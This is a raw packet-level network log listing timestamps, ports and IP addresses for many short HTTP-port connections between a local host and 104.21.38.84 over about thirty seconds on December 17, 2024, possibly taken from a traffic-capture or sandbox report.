Dec 17, 2024 00:08:38.202512980 CET	49867	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:38.322325945 CET	80	49867	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:38.554647923 CET	49867	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:38.674731970 CET	80	49867	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:39.288321972 CET	80	49867	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:39.335572004 CET	49867	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:39.538472891 CET	80	49867	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:39.585510969 CET	49867	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:39.663414001 CET	49873	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:39.783673048 CET	80	49873	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:39.784054041 CET	49873	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:39.784188986 CET	49873	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:39.904128075 CET	80	49873	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:40.132503986 CET	49873	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:40.252824068 CET	80	49873	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:40.876115084 CET	80	49873	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:40.929291964 CET	49873	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:41.146778107 CET	80	49873	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:41.194915056 CET	49873	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:41.390656948 CET	49867	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:41.433267117 CET	49873	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:41.433667898 CET	49879	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:41.437885046 CET	49880	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:41.555026054 CET	80	49879	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:41.555069923 CET	80	49873	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:41.555103064 CET	49879	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:41.555149078 CET	49873	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:41.558037996 CET	80	49880	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:41.560132980 CET	49880	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:41.611969948 CET	49879	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:41.612075090 CET	49880	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:41.733719110 CET	80	49879	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:41.733736992 CET	80	49880	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:41.961016893 CET	49879	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:41.961031914 CET	49880	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:42.083137989 CET	80	49879	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:42.083158016 CET	80	49880	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:42.083170891 CET	80	49880	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:42.641963005 CET	80	49879	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:42.646148920 CET	80	49880	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:42.694892883 CET	49879	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:42.694902897 CET	49880	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:42.892690897 CET	80	49879	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:42.904978037 CET	80	49880	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:42.944890976 CET	49879	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:42.960546017 CET	49880	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:43.019207954 CET	49886	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:43.096213102 CET	80	49880	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:43.144174099 CET	80	49886	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:43.144262075 CET	49886	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:43.148031950 CET	49880	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:43.220376015 CET	49879	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:43.220442057 CET	49880	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:43.220985889 CET	49887	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:43.342819929 CET	80	49879	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:43.342864037 CET	80	49887	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:43.343770981 CET	80	49880	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:43.345535994 CET	49879	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:43.345597029 CET	49880	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:43.345784903 CET	49887	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:43.345784903 CET	49887	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:43.465708017 CET	80	49887	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:43.695163965 CET	49887	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:43.815407991 CET	80	49887	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:44.431359053 CET	80	49887	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:44.476159096 CET	49887	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:44.759542942 CET	80	49887	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:44.804282904 CET	49887	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:44.878962994 CET	49892	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:44.999078989 CET	80	49892	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:44.999303102 CET	49892	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:44.999422073 CET	49892	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:45.119434118 CET	80	49892	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:45.351337910 CET	49892	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:45.473566055 CET	80	49892	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:46.087371111 CET	80	49892	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:46.132432938 CET	49892	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:46.321422100 CET	80	49892	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:46.367007971 CET	49892	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:46.440325975 CET	49887	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:46.447293997 CET	49892	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:46.448251963 CET	49894	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:46.593044043 CET	80	49892	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:46.593081951 CET	80	49894	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:46.593178034 CET	49892	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:46.593249083 CET	49894	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:46.593363047 CET	49894	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:46.713011026 CET	80	49894	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:46.945178986 CET	49894	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:47.065069914 CET	80	49894	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:47.677783012 CET	80	49894	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:47.726305962 CET	49894	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:47.913743973 CET	80	49894	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:47.960644007 CET	49894	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:48.037465096 CET	49900	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:48.102287054 CET	49901	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:48.157525063 CET	80	49900	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:48.157639980 CET	49900	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:48.222203970 CET	80	49901	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:48.222362041 CET	49901	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:48.222496033 CET	49901	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:48.223231077 CET	49902	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:48.342366934 CET	80	49901	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:48.343415976 CET	80	49902	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:48.343501091 CET	49902	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:48.345400095 CET	49902	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:48.465117931 CET	80	49902	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:48.570152998 CET	49901	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:48.690191984 CET	80	49901	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:48.690259933 CET	80	49901	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:48.695005894 CET	49902	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:48.815237999 CET	80	49902	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:49.306756973 CET	80	49901	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:49.351267099 CET	49901	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:49.437268019 CET	80	49902	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:49.491868019 CET	49902	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:49.561326027 CET	80	49901	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:49.616806984 CET	49901	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:49.687947035 CET	80	49902	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:49.741775036 CET	49902	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:49.880300999 CET	80	49902	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:49.929414034 CET	49902	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:50.002520084 CET	49894	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:50.003976107 CET	49902	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:50.003971100 CET	49901	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:50.004653931 CET	49908	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:50.126425028 CET	80	49902	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:50.126609087 CET	49902	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:50.126626015 CET	80	49901	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:50.126660109 CET	80	49908	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:50.126702070 CET	49901	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:50.126790047 CET	49908	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:50.126821995 CET	49908	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:50.246834040 CET	80	49908	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:50.476283073 CET	49908	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:50.596313000 CET	80	49908	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:51.212404013 CET	80	49908	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:51.257582903 CET	49908	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:51.459161043 CET	80	49908	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:51.507524014 CET	49908	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:51.593894005 CET	49914	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:51.713969946 CET	80	49914	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:51.714098930 CET	49914	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:51.714214087 CET	49914	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:51.834131002 CET	80	49914	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:52.070991993 CET	49914	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:52.191088915 CET	80	49914	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:52.804827929 CET	80	49914	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:52.851274967 CET	49914	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:53.033438921 CET	80	49914	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:53.085659981 CET	49914	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:53.159274101 CET	49914	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:53.159843922 CET	49915	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:53.279691935 CET	80	49914	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:53.279753923 CET	80	49915	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:53.279827118 CET	49915	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:53.279879093 CET	49914	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:53.279964924 CET	49915	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:53.399750948 CET	80	49915	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:53.632625103 CET	49915	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:53.752901077 CET	80	49915	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:54.365751982 CET	80	49915	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:54.413669109 CET	49915	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:54.571190119 CET	49921	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:54.571423054 CET	49915	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:54.601501942 CET	80	49915	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:54.601592064 CET	49915	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:54.691721916 CET	80	49921	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:54.691778898 CET	80	49915	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:54.691840887 CET	49921	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:54.691890955 CET	49915	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:54.691989899 CET	49921	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:54.694822073 CET	49922	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:54.811794996 CET	80	49921	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:54.814697981 CET	80	49922	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:54.815049887 CET	49922	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:54.815051079 CET	49922	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:54.935234070 CET	80	49922	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:55.038913965 CET	49921	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:55.159488916 CET	80	49921	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:55.159621954 CET	80	49921	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:55.163758993 CET	49922	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:55.283782005 CET	80	49922	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:55.793066025 CET	80	49921	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:55.835557938 CET	49921	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:55.900878906 CET	80	49922	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:55.944941998 CET	49922	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.049154997 CET	80	49921	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:56.052289963 CET	49756	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.052393913 CET	49772	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.052428007 CET	49908	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.101208925 CET	49921	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.187881947 CET	80	49922	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:56.241808891 CET	49922	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.379504919 CET	80	49922	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:56.429436922 CET	49922	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.502022028 CET	49921	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.502348900 CET	49922	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.502876997 CET	49928	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.622497082 CET	80	49921	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:56.622636080 CET	49921	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.622910023 CET	80	49928	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:56.622977972 CET	80	49922	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:56.623142004 CET	49928	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.623142958 CET	49928	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.623157978 CET	49922	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:56.743020058 CET	80	49928	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:56.976289988 CET	49928	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:57.096503973 CET	80	49928	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:57.713401079 CET	80	49928	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:57.757560015 CET	49928	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:57.957628012 CET	80	49928	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:58.007611990 CET	49928	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:58.114980936 CET	49933	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:58.235352993 CET	80	49933	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:58.235766888 CET	49933	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:58.235766888 CET	49933	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:58.355962038 CET	80	49933	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:58.586821079 CET	49933	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:58.707133055 CET	80	49933	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:59.327972889 CET	80	49933	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:59.382586002 CET	49933	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:59.572300911 CET	80	49933	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:59.617031097 CET	49933	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:59.691286087 CET	49933	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:59.691529036 CET	49934	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:59.811388016 CET	80	49934	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:59.811858892 CET	80	49933	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:59.811978102 CET	49933	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:59.812093973 CET	49934	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:59.812093973 CET	49934	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:59.932202101 CET	80	49934	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:00.163755894 CET	49934	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:00.284791946 CET	80	49934	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:00.898370981 CET	80	49934	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:00.944957972 CET	49934	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:01.135255098 CET	80	49934	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:01.179305077 CET	49934	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:01.220686913 CET	49939	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:01.332509995 CET	49940	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:01.340892076 CET	80	49939	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:01.341147900 CET	49939	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:01.341248989 CET	49939	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:01.452928066 CET	80	49940	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:01.453212023 CET	49940	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:01.453212023 CET	49940	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:01.461472034 CET	80	49939	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:01.573755026 CET	80	49940	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:01.695030928 CET	49939	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:01.804605961 CET	49940	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:01.814975977 CET	80	49939	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:01.815047026 CET	80	49939	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:01.924524069 CET	80	49940	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:02.428663969 CET	80	49939	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:02.476202011 CET	49939	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:02.540860891 CET	80	49940	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:02.585763931 CET	49940	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:02.661415100 CET	80	49939	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:02.710583925 CET	49939	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:02.800127029 CET	80	49940	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:02.851267099 CET	49940	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:02.991908073 CET	80	49940	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:03.038789034 CET	49940	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:03.111813068 CET	49939	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:03.111866951 CET	49934	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:03.111972094 CET	49940	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:03.112862110 CET	49946	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:03.232348919 CET	80	49939	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:03.232940912 CET	80	49946	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:03.233011961 CET	80	49934	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:03.233042955 CET	80	49940	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:03.233097076 CET	49939	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:03.233124971 CET	49934	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:03.233141899 CET	49946	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:03.233272076 CET	49946	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:03.233283043 CET	49940	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:03.353621960 CET	80	49946	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:03.641971111 CET	49946	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:03.762300968 CET	80	49946	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:04.320277929 CET	80	49946	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:04.366832972 CET	49946	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:04.553252935 CET	80	49946	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:04.601207018 CET	49946	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:04.674335003 CET	49951	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:04.794440031 CET	80	49951	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:04.794608116 CET	49951	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:04.794711113 CET	49951	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:04.914774895 CET	80	49951	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:05.148277044 CET	49951	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:05.268954992 CET	80	49951	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:05.881233931 CET	80	49951	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:05.929378033 CET	49951	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:06.135813951 CET	80	49951	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:06.179357052 CET	49951	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:06.255774975 CET	49951	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:06.256524086 CET	49953	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:06.376601934 CET	80	49951	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:06.376744986 CET	49951	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:06.376872063 CET	80	49953	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:06.377172947 CET	49953	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:06.377172947 CET	49953	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:06.497421026 CET	80	49953	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:06.726455927 CET	49953	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:06.846827984 CET	80	49953	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:07.476131916 CET	80	49953	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:07.523273945 CET	49953	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:07.664820910 CET	49953	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:07.665340900 CET	49957	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:07.735405922 CET	80	49953	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:07.738271952 CET	49953	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:07.785226107 CET	80	49953	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:07.785360098 CET	49958	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:07.785384893 CET	49953	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:07.785566092 CET	80	49957	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:07.785856962 CET	49957	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:07.785954952 CET	49957	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:07.905244112 CET	80	49958	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:07.905812979 CET	80	49957	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:07.905911922 CET	49958	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:07.906126022 CET	49958	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:08.026309967 CET	80	49958	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:08.132726908 CET	49957	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:08.252830029 CET	80	49957	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:08.253026962 CET	80	49957	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:08.257707119 CET	49958	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:08.378066063 CET	80	49958	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:08.871535063 CET	80	49957	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:08.913733959 CET	49957	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:09.013562918 CET	80	49958	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:09.054354906 CET	49958	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:09.112373114 CET	80	49957	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:09.163829088 CET	49957	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:09.274710894 CET	80	49958	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:09.320111036 CET	49958	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:09.399398088 CET	49957	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:09.399663925 CET	49958	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:09.400468111 CET	49964	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:09.520207882 CET	80	49957	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:09.520291090 CET	49957	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:09.520651102 CET	80	49958	104.21.38.84	192.168.2.4
